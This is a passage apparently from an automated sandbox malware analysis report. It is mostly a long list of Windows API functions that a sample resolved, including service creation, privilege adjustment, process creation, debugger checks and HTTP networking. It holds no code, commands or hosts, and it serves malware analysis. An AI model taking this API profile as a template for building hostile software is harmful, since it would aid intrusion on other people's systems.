  1094. "pdbpath": null,
  1095. "imported_dll_count": 16,
  1096. "versioninfo": []
  1097. }
  1098. }
  1099.  
  1100. [*] Resolved APIs: [
  1101. "kernel32.dll.FileTimeToSystemTime",
  1102. "kernel32.dll.GetTimeZoneInformation",
  1103. "kernel32.dll.SetLastError",
  1104. "kernel32.dll.GetSystemDirectoryA",
  1105. "kernel32.dll.GetWindowsDirectoryA",
  1106. "kernel32.dll.GetCurrentProcess",
  1107. "kernel32.dll.MultiByteToWideChar",
  1108. "kernel32.dll.WideCharToMultiByte",
  1109. "kernel32.dll.Process32Next",
  1110. "kernel32.dll.Process32First",
  1111. "kernel32.dll.CreateToolhelp32Snapshot",
  1112. "kernel32.dll.SetFilePointer",
  1113. "kernel32.dll.GetFileSize",
  1114. "kernel32.dll.TerminateProcess",
  1115. "kernel32.dll.OpenProcess",
  1116. "kernel32.dll.GetVersion",
  1117. "kernel32.dll.TerminateThread",
  1118. "kernel32.dll.CreateSemaphoreA",
  1119. "kernel32.dll.ResumeThread",
  1120. "kernel32.dll.ReleaseSemaphore",
  1121. "kernel32.dll.EnterCriticalSection",
  1122. "kernel32.dll.LeaveCriticalSection",
  1123. "kernel32.dll.GetProfileStringA",
  1124. "kernel32.dll.WriteFile",
  1125. "kernel32.dll.InterlockedExchange",
  1126. "kernel32.dll.IsBadCodePtr",
  1127. "kernel32.dll.CompareStringW",
  1128. "kernel32.dll.CompareStringA",
  1129. "kernel32.dll.GetStringTypeW",
  1130. "kernel32.dll.GetStringTypeA",
  1131. "kernel32.dll.SetUnhandledExceptionFilter",
  1132. "kernel32.dll.IsBadWritePtr",
  1133. "kernel32.dll.VirtualAlloc",
  1134. "kernel32.dll.LCMapStringW",
  1135. "kernel32.dll.LCMapStringA",
  1136. "kernel32.dll.SetEnvironmentVariableA",
  1137. "kernel32.dll.VirtualFree",
  1138. "kernel32.dll.HeapCreate",
  1139. "kernel32.dll.HeapDestroy",
  1140. "kernel32.dll.GetEnvironmentVariableA",
  1141. "kernel32.dll.GetStdHandle",
  1142. "kernel32.dll.SetHandleCount",
  1143. "kernel32.dll.GetEnvironmentStringsW",
  1144. "kernel32.dll.GetEnvironmentStrings",
  1145. "kernel32.dll.FreeEnvironmentStringsW",
  1146. "kernel32.dll.FreeEnvironmentStringsA",
  1147. "kernel32.dll.UnhandledExceptionFilter",
  1148. "kernel32.dll.GetFileType",
  1149. "kernel32.dll.SetStdHandle",
  1150. "kernel32.dll.GetACP",
  1151. "kernel32.dll.HeapSize",
  1152. "kernel32.dll.RaiseException",
  1153. "kernel32.dll.GetLocalTime",
  1154. "kernel32.dll.GetSystemTime",
  1155. "kernel32.dll.RtlUnwind",
  1156. "kernel32.dll.GetStartupInfoA",
  1157. "kernel32.dll.GetOEMCP",
  1158. "kernel32.dll.GetCPInfo",
  1159. "kernel32.dll.GetProcessVersion",
  1160. "kernel32.dll.SetErrorMode",
  1161. "kernel32.dll.GlobalFlags",
  1162. "kernel32.dll.GetCurrentThread",
  1163. "kernel32.dll.GetFileTime",
  1164. "kernel32.dll.TlsGetValue",
  1165. "kernel32.dll.LocalReAlloc",
  1166. "kernel32.dll.TlsSetValue",
  1167. "kernel32.dll.TlsFree",
  1168. "kernel32.dll.GlobalHandle",
  1169. "kernel32.dll.TlsAlloc",
  1170. "kernel32.dll.LocalAlloc",
  1171. "kernel32.dll.lstrcmpA",
  1172. "kernel32.dll.GlobalGetAtomNameA",
  1173. "kernel32.dll.GlobalAddAtomA",
  1174. "kernel32.dll.GlobalFindAtomA",
  1175. "kernel32.dll.GlobalDeleteAtom",
  1176. "kernel32.dll.lstrcmpiA",
  1177. "kernel32.dll.SetEndOfFile",
  1178. "kernel32.dll.UnlockFile",
  1179. "kernel32.dll.LockFile",
  1180. "kernel32.dll.FlushFileBuffers",
  1181. "kernel32.dll.DuplicateHandle",
  1182. "kernel32.dll.lstrcpynA",
  1183. "kernel32.dll.FileTimeToLocalFileTime",
  1184. "kernel32.dll.LocalFree",
  1185. "kernel32.dll.InterlockedDecrement",
  1186. "kernel32.dll.InterlockedIncrement",
  1187. "kernel32.dll.WaitForMultipleObjects",
  1188. "kernel32.dll.CreateFileA",
  1189. "kernel32.dll.SetEvent",
  1190. "kernel32.dll.FindResourceA",
  1191. "kernel32.dll.LoadResource",
  1192. "kernel32.dll.LockResource",
  1193. "kernel32.dll.ReadFile",
  1194. "kernel32.dll.CloseHandle",
  1195. "kernel32.dll.WaitForSingleObject",
  1196. "kernel32.dll.CreateProcessA",
  1197. "kernel32.dll.GetTickCount",
  1198. "kernel32.dll.GetCommandLineA",
  1199. "kernel32.dll.MulDiv",
  1200. "kernel32.dll.GetProcAddress",
  1201. "kernel32.dll.GetModuleHandleA",
  1202. "kernel32.dll.GetVolumeInformationA",
  1203. "kernel32.dll.SetCurrentDirectoryA",
  1204. "kernel32.dll.CreateDirectoryA",
  1205. "kernel32.dll.CopyFileA",
  1206. "kernel32.dll.DeleteFileA",
  1207. "kernel32.dll.lstrlenW",
  1208. "kernel32.dll.RemoveDirectoryA",
  1209. "kernel32.dll.GetModuleFileNameA",
  1210. "kernel32.dll.GetCurrentThreadId",
  1211. "kernel32.dll.ExitProcess",
  1212. "kernel32.dll.GlobalSize",
  1213. "kernel32.dll.GlobalFree",
  1214. "kernel32.dll.DeleteCriticalSection",
  1215. "kernel32.dll.InitializeCriticalSection",
  1216. "kernel32.dll.lstrcatA",
  1217. "kernel32.dll.lstrlenA",
  1218. "kernel32.dll.WinExec",
  1219. "kernel32.dll.lstrcpyA",
  1220. "kernel32.dll.FindNextFileA",
  1221. "kernel32.dll.GlobalReAlloc",
  1222. "kernel32.dll.HeapFree",
  1223. "kernel32.dll.HeapReAlloc",
  1224. "kernel32.dll.GetProcessHeap",
  1225. "kernel32.dll.HeapAlloc",
  1226. "kernel32.dll.GetUserDefaultLCID",
  1227. "kernel32.dll.GetFullPathNameA",
  1228. "kernel32.dll.FreeLibrary",
  1229. "kernel32.dll.LoadLibraryA",
  1230. "kernel32.dll.GetLastError",
  1231. "kernel32.dll.GetVersionExA",
  1232. "kernel32.dll.WritePrivateProfileStringA",
  1233. "kernel32.dll.CreateThread",
  1234. "kernel32.dll.CreateEventA",
  1235. "kernel32.dll.Sleep",
  1236. "kernel32.dll.GlobalAlloc",
  1237. "kernel32.dll.GlobalLock",
  1238. "kernel32.dll.GlobalUnlock",
  1239. "kernel32.dll.GetTempPathA",
  1240. "kernel32.dll.FindFirstFileA",
  1241. "kernel32.dll.FindClose",
  1242. "kernel32.dll.SetFileAttributesA",
  1243. "kernel32.dll.GetFileAttributesA",
  1244. "kernel32.dll.MoveFileA",
  1245. "kernel32.dll.IsBadReadPtr",
  1246. "advapi32.dll.RegQueryValueA",
  1247. "advapi32.dll.RegSetValueExA",
  1248. "advapi32.dll.RegOpenKeyExA",
  1249. "advapi32.dll.RegCloseKey",
  1250. "advapi32.dll.RegCreateKeyExA",
  1251. "comctl32.dll.ImageList_Destroy",
  1252. "comctl32.dll.#17",
  1253. "comdlg32.dll.ChooseColorA",
  1254. "comdlg32.dll.GetOpenFileNameA",
  1255. "comdlg32.dll.GetFileTitleA",
  1256. "comdlg32.dll.GetSaveFileNameA",
  1257. "gdi32.dll.Escape",
  1258. "gdi32.dll.ExtTextOutA",
  1259. "gdi32.dll.TextOutA",
  1260. "gdi32.dll.RectVisible",
  1261. "gdi32.dll.PtVisible",
  1262. "gdi32.dll.GetViewportExtEx",
  1263. "gdi32.dll.ExtSelectClipRgn",
  1264. "gdi32.dll.LineTo",
  1265. "gdi32.dll.MoveToEx",
  1266. "gdi32.dll.ExcludeClipRect",
  1267. "gdi32.dll.GetClipBox",
  1268. "gdi32.dll.ScaleWindowExtEx",
  1269. "gdi32.dll.SetWindowExtEx",
  1270. "gdi32.dll.GetTextMetricsA",
  1271. "gdi32.dll.SetStretchBltMode",
  1272. "gdi32.dll.GetClipRgn",
  1273. "gdi32.dll.CreatePolygonRgn",
  1274. "gdi32.dll.SelectClipRgn",
  1275. "gdi32.dll.DeleteObject",
  1276. "gdi32.dll.CreateDIBitmap",
  1277. "gdi32.dll.GetSystemPaletteEntries",
  1278. "gdi32.dll.CreatePalette",
  1279. "gdi32.dll.StretchBlt",
  1280. "gdi32.dll.SelectPalette",
  1281. "gdi32.dll.RealizePalette",
  1282. "gdi32.dll.GetDIBits",
  1283. "gdi32.dll.GetWindowExtEx",
  1284. "gdi32.dll.GetViewportOrgEx",
  1285. "gdi32.dll.GetWindowOrgEx",
  1286. "gdi32.dll.BeginPath",
  1287. "gdi32.dll.EndPath",
  1288. "gdi32.dll.PathToRegion",
  1289. "gdi32.dll.CreateEllipticRgn",
  1290. "gdi32.dll.CreateRoundRectRgn",
  1291. "gdi32.dll.GetTextColor",
  1292. "gdi32.dll.GetBkMode",
  1293. "gdi32.dll.GetBkColor",
  1294. "gdi32.dll.GetROP2",
  1295. "gdi32.dll.GetStretchBltMode",
  1296. "gdi32.dll.GetPolyFillMode",
  1297. "gdi32.dll.CreateCompatibleBitmap",
  1298. "gdi32.dll.CreateDCA",
  1299. "gdi32.dll.CreateBitmap",
  1300. "gdi32.dll.SelectObject",
  1301. "gdi32.dll.CreatePen",
  1302. "gdi32.dll.PatBlt",
  1303. "gdi32.dll.CombineRgn",
  1304. "gdi32.dll.CreateRectRgn",
  1305. "gdi32.dll.FillRgn",
  1306. "gdi32.dll.CreateSolidBrush",
  1307. "gdi32.dll.CreateFontIndirectA",
  1308. "gdi32.dll.GetStockObject",
  1309. "gdi32.dll.GetObjectA",
  1310. "gdi32.dll.EndPage",
  1311. "gdi32.dll.EndDoc",
  1312. "gdi32.dll.DeleteDC",
  1313. "gdi32.dll.StartDocA",
  1314. "gdi32.dll.StartPage",
  1315. "gdi32.dll.BitBlt",
  1316. "gdi32.dll.CreateCompatibleDC",
  1317. "gdi32.dll.Ellipse",
  1318. "gdi32.dll.Rectangle",
  1319. "gdi32.dll.LPtoDP",
  1320. "gdi32.dll.DPtoLP",
  1321. "gdi32.dll.GetCurrentObject",
  1322. "gdi32.dll.RoundRect",
  1323. "gdi32.dll.GetTextExtentPoint32A",
  1324. "gdi32.dll.GetDeviceCaps",
  1325. "gdi32.dll.CreateRectRgnIndirect",
  1326. "gdi32.dll.SetBkColor",
  1327. "gdi32.dll.SaveDC",
  1328. "gdi32.dll.RestoreDC",
  1329. "gdi32.dll.SetBkMode",
  1330. "gdi32.dll.SetPolyFillMode",
  1331. "gdi32.dll.SetROP2",
  1332. "gdi32.dll.SetTextColor",
  1333. "gdi32.dll.SetMapMode",
  1334. "gdi32.dll.SetViewportOrgEx",
  1335. "gdi32.dll.OffsetViewportOrgEx",
  1336. "gdi32.dll.SetViewportExtEx",
  1337. "gdi32.dll.ScaleViewportExtEx",
  1338. "gdi32.dll.SetWindowOrgEx",
  1339. "iphlpapi.dll.GetAdaptersInfo",
  1340. "ole32.dll.CLSIDFromProgID",
  1341. "ole32.dll.OleRun",
  1342. "ole32.dll.CoCreateInstance",
  1343. "ole32.dll.CLSIDFromString",
  1344. "ole32.dll.OleUninitialize",
  1345. "ole32.dll.OleInitialize",
  1346. "oleaut32.dll.#23",
  1347. "oleaut32.dll.#25",
  1348. "oleaut32.dll.#11",
  1349. "oleaut32.dll.#8",
  1350. "oleaut32.dll.#2",
  1351. "oleaut32.dll.#16",
  1352. "oleaut32.dll.#15",
  1353. "oleaut32.dll.#26",
  1354. "oleaut32.dll.#163",
  1355. "oleaut32.dll.#165",
  1356. "oleaut32.dll.#24",
  1357. "oleaut32.dll.#17",
  1358. "oleaut32.dll.#20",
  1359. "oleaut32.dll.#19",
  1360. "oleaut32.dll.#12",
  1361. "oleaut32.dll.#9",
  1362. "oleaut32.dll.#161",
  1363. "oleaut32.dll.#186",
  1364. "oleaut32.dll.#10",
  1365. "rasapi32.dll.RasHangUpA",
  1366. "rasapi32.dll.RasGetConnectStatusA",
  1367. "shell32.dll.SHGetSpecialFolderPathA",
  1368. "shell32.dll.Shell_NotifyIconA",
  1369. "shell32.dll.ShellExecuteA",
  1370. "user32.dll.WaitForInputIdle",
  1371. "user32.dll.GetClipboardData",
  1372. "user32.dll.OpenClipboard",
  1373. "user32.dll.wsprintfA",
  1374. "user32.dll.CloseClipboard",
  1375. "user32.dll.EqualRect",
  1376. "user32.dll.SetClipboardData",
  1377. "user32.dll.EmptyClipboard",
  1378. "user32.dll.GetSystemMetrics",
  1379. "user32.dll.GetCursorPos",
  1380. "user32.dll.MessageBoxA",
  1381. "user32.dll.GetSysColorBrush",
  1382. "user32.dll.GetWindowTextA",
  1383. "user32.dll.GetDlgItem",
  1384. "user32.dll.FindWindowA",
  1385. "user32.dll.GetWindowThreadProcessId",
  1386. "user32.dll.GetClassNameA",
  1387. "user32.dll.GetDesktopWindow",
  1388. "user32.dll.GetForegroundWindow",
  1389. "user32.dll.SetWindowTextA",
  1390. "user32.dll.LoadIconA",
  1391. "user32.dll.TranslateMessage",
  1392. "user32.dll.DrawFrameControl",
  1393. "user32.dll.DrawEdge",
  1394. "user32.dll.DrawFocusRect",
  1395. "user32.dll.WindowFromPoint",
  1396. "user32.dll.GetMessageA",
  1397. "user32.dll.DispatchMessageA",
  1398. "user32.dll.SetRectEmpty",
  1399. "user32.dll.RegisterClipboardFormatA",
  1400. "user32.dll.CreateIconFromResourceEx",
  1401. "user32.dll.CreateIconFromResource",
  1402. "user32.dll.DrawIconEx",
  1403. "user32.dll.CreatePopupMenu",
  1404. "user32.dll.AppendMenuA",
  1405. "user32.dll.ModifyMenuA",
  1406. "user32.dll.CreateMenu",
  1407. "user32.dll.CreateAcceleratorTableA",
  1408. "user32.dll.GetDlgCtrlID",
  1409. "user32.dll.LoadStringA",
  1410. "user32.dll.GetMenuCheckMarkDimensions",
  1411. "user32.dll.GetMenuState",
  1412. "user32.dll.SetMenuItemBitmaps",
  1413. "user32.dll.CheckMenuItem",
  1414. "user32.dll.MoveWindow",
  1415. "user32.dll.IsDialogMessageA",
  1416. "user32.dll.ScrollWindowEx",
  1417. "user32.dll.SendDlgItemMessageA",
  1418. "user32.dll.MapWindowPoints",
  1419. "user32.dll.AdjustWindowRectEx",
  1420. "user32.dll.GetScrollPos",
  1421. "user32.dll.RegisterClassA",
  1422. "user32.dll.GetMenuItemCount",
  1423. "user32.dll.GetMenuItemID",
  1424. "user32.dll.CreateWindowExA",
  1425. "user32.dll.SetWindowsHookExA",
  1426. "user32.dll.CallNextHookEx",
  1427. "user32.dll.GetClassLongA",
  1428. "user32.dll.SetPropA",
  1429. "user32.dll.UnhookWindowsHookEx",
  1430. "user32.dll.GetPropA",
  1431. "user32.dll.CallWindowProcA",
  1432. "user32.dll.GetSubMenu",
  1433. "user32.dll.EnableMenuItem",
  1434. "user32.dll.ClientToScreen",
  1435. "user32.dll.EnumDisplaySettingsA",
  1436. "user32.dll.LoadImageA",
  1437. "user32.dll.SystemParametersInfoA",
  1438. "user32.dll.ShowWindow",
  1439. "user32.dll.IsWindowEnabled",
  1440. "user32.dll.TranslateAcceleratorA",
  1441. "user32.dll.GetKeyState",
  1442. "user32.dll.CopyAcceleratorTableA",
  1443. "user32.dll.PostQuitMessage",
  1444. "user32.dll.IsZoomed",
  1445. "user32.dll.GetClassInfoA",
  1446. "user32.dll.DefWindowProcA",
  1447. "user32.dll.GetMenu",
  1448. "user32.dll.SetMenu",
  1449. "user32.dll.PeekMessageA",
  1450. "user32.dll.IsIconic",
  1451. "user32.dll.SetFocus",
  1452. "user32.dll.GetActiveWindow",
  1453. "user32.dll.GetWindow",
  1454. "user32.dll.DestroyAcceleratorTable",
  1455. "user32.dll.SetWindowRgn",
  1456. "user32.dll.GetMessagePos",
  1457. "user32.dll.ScreenToClient",
  1458. "user32.dll.ChildWindowFromPointEx",
  1459. "user32.dll.CopyRect",
  1460. "user32.dll.LoadBitmapA",
  1461. "user32.dll.WinHelpA",
  1462. "user32.dll.KillTimer",
  1463. "user32.dll.SetTimer",
  1464. "user32.dll.ReleaseCapture",
  1465. "user32.dll.GetCapture",
  1466. "user32.dll.SetCapture",
  1467. "user32.dll.GetScrollRange",
  1468. "user32.dll.SetScrollRange",
  1469. "user32.dll.SetScrollPos",
  1470. "user32.dll.SetRect",
  1471. "user32.dll.InflateRect",
  1472. "user32.dll.IntersectRect",
  1473. "user32.dll.DestroyIcon",
  1474. "user32.dll.PtInRect",
  1475. "user32.dll.OffsetRect",
  1476. "user32.dll.IsWindowVisible",
  1477. "user32.dll.EnableWindow",
  1478. "user32.dll.RedrawWindow",
  1479. "user32.dll.GetWindowLongA",
  1480. "user32.dll.SetWindowLongA",
  1481. "user32.dll.GetSysColor",
  1482. "user32.dll.SetActiveWindow",
  1483. "user32.dll.SetCursorPos",
  1484. "user32.dll.LoadCursorA",
  1485. "user32.dll.SetCursor",
  1486. "user32.dll.GetDC",
  1487. "user32.dll.FillRect",
  1488. "user32.dll.IsRectEmpty",
  1489. "user32.dll.ReleaseDC",
  1490. "user32.dll.IsChild",
  1491. "user32.dll.DestroyMenu",
  1492. "user32.dll.SetForegroundWindow",
  1493. "user32.dll.GetWindowRect",
  1494. "user32.dll.UnregisterClassA",
  1495. "user32.dll.UpdateWindow",
  1496. "user32.dll.ValidateRect",
  1497. "user32.dll.InvalidateRect",
  1498. "user32.dll.GetClientRect",
  1499. "user32.dll.GetFocus",
  1500. "user32.dll.GetParent",
  1501. "user32.dll.GetTopWindow",
  1502. "user32.dll.PostMessageA",
  1503. "user32.dll.IsWindow",
  1504. "user32.dll.SetParent",
  1505. "user32.dll.DestroyCursor",
  1506. "user32.dll.SendMessageA",
  1507. "user32.dll.SetWindowPos",
  1508. "user32.dll.GetWindowTextLengthA",
  1509. "user32.dll.CharUpperA",
  1510. "user32.dll.GetWindowDC",
  1511. "user32.dll.BeginPaint",
  1512. "user32.dll.EndPaint",
  1513. "user32.dll.TabbedTextOutA",
  1514. "user32.dll.DrawTextA",
  1515. "user32.dll.GrayStringA",
  1516. "user32.dll.DestroyWindow",
  1517. "user32.dll.CreateDialogIndirectParamA",
  1518. "user32.dll.EndDialog",
  1519. "user32.dll.GetNextDlgTabItem",
  1520. "user32.dll.GetWindowPlacement",
  1521. "user32.dll.RegisterWindowMessageA",
  1522. "user32.dll.GetLastActivePopup",
  1523. "user32.dll.GetMessageTime",
  1524. "user32.dll.RemovePropA",
  1525. "version.dll.GetFileVersionInfoA",
  1526. "version.dll.VerQueryValueA",
  1527. "version.dll.VerLanguageNameA",
  1528. "version.dll.GetFileVersionInfoSizeA",
  1529. "wininet.dll.InternetCanonicalizeUrlA",
  1530. "wininet.dll.InternetCrackUrlA",
  1531. "wininet.dll.HttpOpenRequestA",
  1532. "wininet.dll.HttpSendRequestA",
  1533. "wininet.dll.HttpQueryInfoA",
  1534. "wininet.dll.InternetReadFile",
  1535. "wininet.dll.InternetConnectA",
  1536. "wininet.dll.InternetSetOptionA",
  1537. "wininet.dll.InternetCloseHandle",
  1538. "wininet.dll.InternetOpenA",
  1539. "winmm.dll.midiStreamRestart",
  1540. "winmm.dll.midiStreamClose",
  1541. "winmm.dll.midiOutReset",
  1542. "winmm.dll.midiStreamStop",
  1543. "winmm.dll.waveOutUnprepareHeader",
  1544. "winmm.dll.waveOutPrepareHeader",
  1545. "winmm.dll.waveOutWrite",
  1546. "winmm.dll.waveOutPause",
  1547. "winmm.dll.waveOutReset",
  1548. "winmm.dll.waveOutClose",
  1549. "winmm.dll.midiStreamOut",
  1550. "winmm.dll.midiOutPrepareHeader",
  1551. "winmm.dll.midiStreamProperty",
  1552. "winmm.dll.midiStreamOpen",
  1553. "winmm.dll.midiOutUnprepareHeader",
  1554. "winmm.dll.waveOutOpen",
  1555. "winmm.dll.waveOutGetNumDevs",
  1556. "winspool.drv.OpenPrinterA",
  1557. "winspool.drv.DocumentPropertiesA",
  1558. "winspool.drv.ClosePrinter",
  1559. "ws2_32.dll.#18",
  1560. "ws2_32.dll.#116",
  1561. "ws2_32.dll.#115",
  1562. "ws2_32.dll.#52",
  1563. "ws2_32.dll.#12",
  1564. "ws2_32.dll.#11",
  1565. "ws2_32.dll.#57",
  1566. "ws2_32.dll.#19",
  1567. "ws2_32.dll.#3",
  1568. "ws2_32.dll.#101",
  1569. "ws2_32.dll.#9",
  1570. "ws2_32.dll.#2",
  1571. "ws2_32.dll.#6",
  1572. "ws2_32.dll.#15",
  1573. "ws2_32.dll.#151",
  1574. "ws2_32.dll.#1",
  1575. "ws2_32.dll.#5",
  1576. "ws2_32.dll.#13",
  1577. "ws2_32.dll.#16",
  1578. "ws2_32.dll.#8",
  1579. "ws2_32.dll.#23",
  1580. "ws2_32.dll.#4",
  1581. "ws2_32.dll.#10",
  1582. "ws2_32.dll.#20",
  1583. "ws2_32.dll.#17",
  1584. "kernel32.dll.IsProcessorFeaturePresent",
  1585. "cryptbase.dll.SystemFunction036",
  1586. "dwmapi.dll.DwmIsCompositionEnabled",
  1587. "kernel32.dll.GetNativeSystemInfo",
  1588. "kernel32.dll.Wow64DisableWow64FsRedirection",
  1589. "advapi32.dll.RegDisableReflectionKey",
  1590. "advapi32.dll.RegQueryValueExA",
  1591. "advapi32.dll.RegEnableReflectionKey",
  1592. "kernel32.dll.Wow64RevertWow64FsRedirection",
  1593. "advapi32.dll.CryptAcquireContextA",
  1594. "cryptsp.dll.CryptAcquireContextA",
  1595. "advapi32.dll.CryptCreateHash",
  1596. "cryptsp.dll.CryptCreateHash",
  1597. "advapi32.dll.CryptHashData",
  1598. "cryptsp.dll.CryptHashData",
  1599. "advapi32.dll.CryptGetHashParam",
  1600. "cryptsp.dll.CryptGetHashParam",
  1601. "advapi32.dll.CryptDestroyHash",
  1602. "cryptsp.dll.CryptDestroyHash",
  1603. "advapi32.dll.CryptReleaseContext",
  1604. "cryptsp.dll.CryptReleaseContext",
  1605. "kernel32.dll.GetComputerNameA",
  1606. "advapi32.dll.OpenSCManagerA",
  1607. "advapi32.dll.OpenServiceA",
  1608. "advapi32.dll.CloseServiceHandle",
  1609. "ntdll.dll.RtlAdjustPrivilege",
  1610. "kernel32.dll.InterlockedCompareExchange",
  1611. "oleaut32.dll.#500",
  1612. "kernel32.dll.SetThreadUILanguage",
  1613. "kernel32.dll.CopyFileExW",
  1614. "kernel32.dll.IsDebuggerPresent",
  1615. "kernel32.dll.SetConsoleInputExeNameW",
  1616. "kernel32.dll.SortGetHandle",
  1617. "kernel32.dll.SortCloseHandle",
  1618. "mswsock.dll.WSPStartup",
  1619. "wshtcpip.dll.WSHOpenSocket",
  1620. "wshtcpip.dll.WSHOpenSocket2",
  1621. "wshtcpip.dll.WSHJoinLeaf",
  1622. "wshtcpip.dll.WSHNotify",
  1623. "wshtcpip.dll.WSHGetSocketInformation",
  1624. "wshtcpip.dll.WSHSetSocketInformation",
  1625. "wshtcpip.dll.WSHGetSockaddrType",
  1626. "wshtcpip.dll.WSHGetWildcardSockaddr",
  1627. "wshtcpip.dll.WSHGetBroadcastSockaddr",
  1628. "wshtcpip.dll.WSHAddressToString",
  1629. "wshtcpip.dll.WSHStringToAddress",
  1630. "wshtcpip.dll.WSHIoctl",
  1631. "advapi32.dll.StartServiceCtrlDispatcherA",
  1632. "advapi32.dll.CreateServiceA",
  1633. "kernel32.dll.lstrcpyn",
  1634. "advapi32.dll.ChangeServiceConfig2A",
  1635. "advapi32.dll.StartServiceA",
  1636. "advapi32.dll.QueryServiceStatus",
  1637. "advapi32.dll.RegisterServiceCtrlHandlerA",
  1638. "advapi32.dll.SetServiceStatus",
  1639. "rasapi32.dll.RasConnectionNotificationW",
  1640. "sechost.dll.NotifyServiceStatusChangeA",
  1641. "ole32.dll.CoInitializeEx",
  1642. "advapi32.dll.RegDeleteTreeA",
  1643. "advapi32.dll.RegDeleteTreeW",
  1644. "ole32.dll.CoTaskMemAlloc",
  1645. "oleaut32.dll.DllGetClassObject",
  1646. "oleaut32.dll.DllCanUnloadNow",
  1647. "advapi32.dll.RegOpenKeyW",
  1648. "ole32.dll.CoTaskMemFree",
  1649. "ole32.dll.StringFromIID",
  1650. "iphlpapi.dll.GetAdaptersAddresses",
  1651. "dhcpcsvc.dll.DhcpRequestParams",
  1652. "oleaut32.dll.#6",
  1653. "advapi32.dll.ChangeServiceConfigA",
  1654. "ole32.dll.CoUninitialize",
  1655. "kernel32.dll.GetSystemWow64DirectoryA",
  1656. "ntdll.dll.ZwResumeProcess",
  1657. "shlwapi.dll.PathRemoveBlanksA",
  1658. "psapi.dll.GetProcessImageFileNameA",
  1659. "kernel32.dll.GetLogicalDriveStringsA",
  1660. "kernel32.dll.QueryDosDeviceA",
  1661. "kernel32.dll.GetSystemInfo",
  1662. "ntdll.dll.NtWow64QueryInformationProcess64",
  1663. "ntdll.dll.NtWow64ReadVirtualMemory64",
  1664. "psapi.dll.EmptyWorkingSet",
  1665. "iphlpapi.dll.GetExtendedTcpTable",
  1666. "kernel32.dll.InitializeProcThreadAttributeList",
  1667. "kernel32.dll.RtlMoveMemory",
  1668. "kernel32.dll.UpdateProcThreadAttribute",
  1669. "advapi32.dll.CreateProcessAsUserA",
  1670. "kernel32.dll.DeleteProcThreadAttributeList",
  1671. "winhttp.dll.WinHttpOpen",
  1672. "winhttp.dll.WinHttpSetTimeouts",
  1673. "winhttp.dll.WinHttpSetOption",
  1674. "winhttp.dll.WinHttpCrackUrl",
  1675. "shlwapi.dll.StrCmpNW",
  1676. "winhttp.dll.WinHttpConnect",
  1677. "winhttp.dll.WinHttpOpenRequest",
  1678. "winhttp.dll.WinHttpGetDefaultProxyConfiguration",
  1679. "winhttp.dll.WinHttpGetIEProxyConfigForCurrentUser",
  1680. "kernel32.dll.SetPriorityClass",
  1681. "nsi.dll.NsiAllocateAndGetTable",
  1682. "cfgmgr32.dll.CM_Open_Class_Key_ExW",
  1683. "iphlpapi.dll.ConvertInterfaceGuidToLuid",
  1684. "iphlpapi.dll.GetIfEntry2",
  1685. "iphlpapi.dll.GetIpForwardTable2",
  1686. "iphlpapi.dll.GetIpNetEntry2",
  1687. "iphlpapi.dll.FreeMibTable",
  1688. "nsi.dll.NsiFreeTable",
  1689. "winhttp.dll.WinHttpGetProxyForUrl",
  1690. "winhttp.dll.WinHttpSendRequest",
  1691. "ws2_32.dll.GetAddrInfoW",
  1692. "ws2_32.dll.WSASocketW",
  1693. "ws2_32.dll.#21",
  1694. "ws2_32.dll.WSAIoctl",
  1695. "ws2_32.dll.FreeAddrInfoW",
  1696. "ws2_32.dll.WSARecv",
  1697. "ws2_32.dll.WSASend",
  1698. "winhttp.dll.WinHttpReceiveResponse",
  1699. "winhttp.dll.WinHttpQueryHeaders",
  1700. "shlwapi.dll.StrStrIW",
  1701. "winhttp.dll.WinHttpQueryDataAvailable",
  1702. "winhttp.dll.WinHttpReadData",
  1703. "sechost.dll.LookupAccountNameLocalW",
  1704. "rasmontr.dll.InitHelperDll",
  1705. "nshwfp.dll.InitHelperDll",
  1706. "dhcpcmonitor.dll.InitHelperDll",
  1707. "wshelper.dll.InitHelperDll",
  1708. "nshhttp.dll.InitHelperDll",
  1709. "fwcfg.dll.InitHelperDll",
  1710. "authfwcfg.dll.InitHelperDll",
  1711. "ifmon.dll.InitHelperDll",
  1712. "netiohlp.dll.InitHelperDll",
  1713. "whhelper.dll.InitHelperDll",
  1714. "hnetmon.dll.InitHelperDll",
  1715. "rpcnsh.dll.InitHelperDll",
  1716. "dot3cfg.dll.InitHelperDll",
  1717. "napmontr.dll.InitHelperDll",
  1718. "nshipsec.dll.InitHelperDll",
  1719. "p2pnetsh.dll.InitHelperDll",
  1720. "wlancfg.dll.InitHelperDll",
  1721. "peerdistsh.dll.InitHelperDll",
  1722. "cryptsp.dll.CryptEnumProvidersW",
  1723. "user32.dll.LoadStringW",
  1724. "advapi32.dll.RegCreateKeyExW",
  1725. "advapi32.dll.RegOpenKeyExW",
  1726. "sechost.dll.OpenSCManagerW",
  1727. "sechost.dll.OpenServiceW",
  1728. "sechost.dll.QueryServiceConfigW",
  1729. "sechost.dll.CloseServiceHandle",
  1730. "sechost.dll.QueryServiceStatus",
  1731. "advapi32.dll.RegQueryInfoKeyW",
  1732. "advapi32.dll.RegEnumKeyExW",
  1733. "advapi32.dll.LookupAccountSidW",
  1734. "sechost.dll.LookupAccountSidLocalW",
  1735. "cryptsp.dll.CryptAcquireContextW",
  1736. "cryptsp.dll.CryptGenRandom",
  1737. "rpcrtremote.dll.I_RpcExtInitializeExtensionPoint",
  1738. "httpapi.dll.HttpInitialize",
  1739. "userenv.dll.RegisterGPNotification",
  1740. "userenv.dll.UnregisterGPNotification",
  1741. "gpapi.dll.RegisterGPNotificationInternal",
  1742. "bcryptprimitives.dll.GetHashInterface",
  1743. "bcryptprimitives.dll.GetCipherInterface",
  1744. "httpapi.dll.HttpTerminate",
  1745. "gpapi.dll.UnregisterGPNotificationInternal",
  1746. "comctl32.dll.#388",
  1747. "ipsecsvc.dll.SpdServiceMain",
  1748. "rpcrt4.dll.NdrClientCall3",
  1749. "rpcrt4.dll.RpcBindingCreateW",
  1750. "rpcrt4.dll.RpcBindingBind",
  1751. "rpcrt4.dll.I_RpcMapWin32Status",
  1752. "rpcrt4.dll.RpcBindingFree",
  1753. "shfolder.dll.SHGetFolderPathA",
  1754. "setupapi.dll.CM_Get_Device_Interface_List_Size_ExW",
  1755. "setupapi.dll.CM_Get_Device_Interface_List_ExW",
  1756. "comctl32.dll.#332",
  1757. "comctl32.dll.#386",
  1758. "kernel32.dll.GetUserDefaultUILanguage",
  1759. "shell32.dll.#680",
  1760. "system.dll.Call",
  1761. "kernel32.dll.IsWow64Process",
  1762. "nsexec.dll.Exec",
  1763. "kernel32.dll.Wow64EnableWow64FsRedirection",
  1764. "advapi32.dll.DeleteService",
